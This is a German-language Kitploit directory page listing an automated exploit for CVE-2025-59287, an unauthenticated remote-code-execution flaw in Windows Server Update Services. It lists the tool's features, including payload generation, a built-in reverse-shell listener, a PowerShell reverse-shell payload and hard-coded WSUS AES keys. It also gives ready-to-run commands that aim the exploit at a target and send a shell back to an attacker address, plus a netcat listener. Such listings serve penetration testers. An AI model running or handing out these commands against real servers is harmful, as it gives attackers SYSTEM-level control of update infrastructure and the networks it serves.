Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/garvitv14/cve-2025-59287
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

Automatisierter Exploit für CVE-2025-59287, eine nicht authentifizierte RCE in WSUS, mit Payload-Erzeugung, Reverse-Shell-Listener und AES-Verschlüsselung mit fest codierten Schlüsseln.

Repository anzeigen
16257vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59287 WSUS RCE Exploit

Automatisierter Exploit für die Schwachstelle zur nicht authentifizierten Remote-Codeausführung in Windows Server Update Services (WSUS).

Details zur Schwachstelle

  • CVE-ID: CVE-2025-59287
  • CVSS-Score: 9.8 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Authentifizierung: Keine erforderlich
  • Auswirkung: Remote-Codeausführung als SYSTEM

Funktionen

✅ Vollautomatische Payload-Generierung
✅ Automatischer Download der ysoserial.NET-Abhängigkeit
✅ Integrierter Reverse-Shell-Listener
✅ Plattformübergreifende Unterstützung (Windows/Linux/Mac)
✅ AES-Verschlüsselung mit WSUS-Hardcoded-Keys
✅ PowerShell-Reverse-Shell-Payload

Anforderungen

pip install -r requirements.txt

Python-Abhängigkeiten

.NET-Runtime (automatisch erkannt)

  • Windows: .NET Framework (integriert)
  • Linux/Mac: Wine oder Mono Ubuntu/Debian
  • sudo apt install wine-stable

    sudo apt install mono-complete

    Installation

    Exploit-Dateien klonen oder herunterladen

    cd CVE-2025-59287-exploit

    Exploit ausführen (lädt ysoserial.NET automatisch herunter)

    python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

    Verwendung

    Grundlegende Ausnutzung

    python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

    Falls eine Session auf einem anderen Listener gewünscht ist

    Terminal 1: Netcat-Listener starten

    nc -lvnp 4444

    Terminal 2: Exploit ohne integrierten Listener ausführen

    python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

    Tool herunterladen